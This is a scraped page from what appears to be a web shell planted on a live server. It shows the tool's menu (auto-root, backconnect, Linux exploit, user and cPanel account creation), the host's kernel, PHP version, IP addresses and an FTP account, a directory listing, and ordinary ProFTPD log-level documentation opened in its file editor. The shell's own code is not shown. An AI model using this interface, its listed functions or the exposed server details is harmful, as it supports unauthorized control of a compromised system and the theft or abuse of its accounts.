Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
proftpd /
howto /
[ HOME SHELL ]
Name
Size
Permission
Action
ASCII.html
3.71
KB
-rw-r--r--
AWS.html
26.05
KB
-rw-r--r--
AuthFiles.html
9.54
KB
-rw-r--r--
Authentication.html
15.32
KB
-rw-r--r--
BCP.html
13.7
KB
-rw-r--r--
Chroot.html
14.27
KB
-rw-r--r--
Classes.html
5.92
KB
-rw-r--r--
Compiling.html
34.11
KB
-rw-r--r--
ConfigFile.html
16.47
KB
-rw-r--r--
ConfigurationTricks.html
16.54
KB
-rw-r--r--
ConnectionACLs.html
6.84
KB
-rw-r--r--
Controls.html
11.95
KB
-rw-r--r--
CreateHome.html
7.79
KB
-rw-r--r--
DNS.html
6.92
KB
-rw-r--r--
DSO.html
14.9
KB
-rw-r--r--
Debugging.html
12.47
KB
-rw-r--r--
Directory.html
10.89
KB
-rw-r--r--
DisplayFiles.html
6.69
KB
-rw-r--r--
ECCN.html
4.73
KB
-rw-r--r--
FTP.html
16.09
KB
-rw-r--r--
FXP.html
5.57
KB
-rw-r--r--
Filters.html
7.93
KB
-rw-r--r--
Globbing.html
5.53
KB
-rw-r--r--
KeepAlives.html
19.68
KB
-rw-r--r--
Limit.html
15.08
KB
-rw-r--r--
ListOptions.html
6.18
KB
-rw-r--r--
LogLevels.html
5.08
KB
-rw-r--r--
LogMessages.html
14.89
KB
-rw-r--r--
Logging.html
22.37
KB
-rw-r--r--
Memcache.html
9.04
KB
-rw-r--r--
NAT.html
11.15
KB
-rw-r--r--
Nonroot.html
4.23
KB
-rw-r--r--
Quotas.html
17.17
KB
-rw-r--r--
Radius.html
17.35
KB
-rw-r--r--
Redis.html
8.53
KB
-rw-r--r--
Regex.html
22.23
KB
-rw-r--r--
Rewrite.html
16.8
KB
-rw-r--r--
SQL.html
40.55
KB
-rw-r--r--
SSH.html
5.14
KB
-rw-r--r--
Scoreboard.html
9.11
KB
-rw-r--r--
Sendfile.html
7.34
KB
-rw-r--r--
ServerType.html
10.45
KB
-rw-r--r--
Stopping.html
10.31
KB
-rw-r--r--
TLS.html
58.93
KB
-rw-r--r--
Testing.html
8.73
KB
-rw-r--r--
Timestamps.html
6.71
KB
-rw-r--r--
Tracing.html
8.68
KB
-rw-r--r--
Translations.html
3.52
KB
-rw-r--r--
Umask.html
9.16
KB
-rw-r--r--
Upgrade.html
2.14
KB
-rw-r--r--
Versioning.html
5.41
KB
-rw-r--r--
Vhost.html
11.55
KB
-rw-r--r--
VirtualUsers.html
8.8
KB
-rw-r--r--
ftpaccess.html
2.03
KB
-rw-r--r--
index.html
10.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LogLevels.html
<!DOCTYPE html> <html> <head> <title>ProFTPD Logging: Log Levels</title> </head> <body bgcolor=white> <hr> <center><h2><b>ProFTPD Logging: Log Levels</b></h2></center> <hr> <p> <b>Log Levels</b> As mentioned in the <a href="Logging.html#Syslog">logging</a> documentation, log messages are logged at different <em>log levels</em> (also known as log <em>priorities</em>), and with different <em>facilities</em> (<i>i.e.</i> the component generating the log message). <p> The following table lists the supported log levels, in descending priority order. Thus the <code>DEBUG</code> level has the lowest priority, and the <code>EMERG</code> level has the highest priority. <p> <table border=1 summary="Log Levels"> <tr> <td><b> Level </b></td> <td><b> Description </b></td> </tr> <tr> <td> <code>EMERG</code> </td> <td> Fatal/unrecoverable error/condition, application is unusable and stops immediately </td> </tr> <tr> <td> <code>ALERT</code> </td> <td> Condition requires <b>immediate</b> intervention by administrator/operator </td> </tr> <tr> <td> <code>CRIT</code> </td> <td> Condition <b>should</b> be corrected immediately, but indicates <i>e.g.</i> failure in secondary system/library </td> </tr> <tr> <td> <code>ERR</code> </td> <td> Non-urgent failure conditions that should be relayed to developers and/or administrators; <b>should</b> be resolved/corrected soon </td> </tr> <tr> <td> <code>WARNING</code> </td> <td> Unexpected error/condition that <i>may</i> require intervention to review/correct </td> </tr> <tr> <td> <code>NOTICE</code> </td> <td> Significant/noteworthy condition, no intervention/action required </td> </tr> <tr> <td> <code>INFO</code> </td> <td> Normal operating conditions, no intervention/action required </td> </tr> <tr> <td> <code>DEBUG</code> </td> <td> Internal details of application operations useful to developers, not necessarily useful during normal operations </td> </tr> </table> <p> The <code>proftpd</code> daemon can use any or all of the above log levels for its emitted log messages, depending on the situation. You might find that you only want <code>proftpd</code> to log messages above a certain level; for example, you might not be interested in <code>INFO</code> and <code>DEBUG</code> level messages. ProFTPD logs all levels by default. To tell <code>proftpd</code> to silently ignore all log messages below a certain level, use the <a href="../modules/mod_core.html#SyslogLevel"><code>SyslogLevel</code></a> directive. Thus to ignore <code>INFO</code>/<code>DEBUG</code> messages, you would use: <pre> SyslogLevel notice </pre> <p> Note that additional log filtering is also done by the <code>syslogd</code> daemon, to which <code>proftpd</code> logs by default. You will need to consult your <code>syslogd</code> configuration (typically found in <code>/etc/syslog.conf</code>) to see whether it is capturing log messages from the facility used by <code>proftpd</code> (default is "daemon"), and whether it is filtering out messages below a certain level/priority. <p> If you need to tell <code>proftpd</code> to use a different facility, so that it matches your <code>/etc/syslog.conf</code> settings for example, you can use the <a href="../modules/mod_core.html#SyslogFacility"><code>SyslogFacility</code></a> directive like so: <pre> # Tell proftpd to log using the "ftp" facility, rather than "daemon" SyslogFacility ftp </pre> <p><a name="DebugLevel"> <b>The <code>DEBUG</code> Level</b><br> ProFTPD treats the <code>DEBUG</code> log level a little differently. There are so many conditions which are relevant only when triaging a specific issue (such as figuring out why a user cannot log in, or why a file cannot be uploaded) that the <code>DEBUG</code> level would become cluttered. Additional filtering of these debug messages is needed. Thus ProFTPD imposes its own notion of debug levels within the <code>DEBUG</code> logging level/priority. <p> The <a href="../modules/mod_core.html#DebugLevel"><code>DebugLevel</code></a> directive is used to control the granularity/verbosity of the <code>DEBUG</code> level messages; the default level is 0, and goes to 10 (inclusive). In general, the higher the <code>DebugLevel</code>, the more debug messages will be emitted by <code>proftpd</code> to the <code>DEBUG</code> logging level/priority. <p><a name="TraceLog"> <b>Additional Logging</b><br> Note that ProFTPD also supports even finer-grained logging of intervals via its <a href="Tracing.html">trace logging</a>. Trace logging, however, is completely unrelated to <code>syslogd</code>, and thus the syslog <em>facility</em> and <em>level</em> concepts/filtering do <b>not</b> apply to trace logging. <p> <hr> <font size=2><b><i> © Copyright 2013-2017 The ProFTPD Project<br> All Rights Reserved<br> </i></b></font> <hr> </body> </html>
Close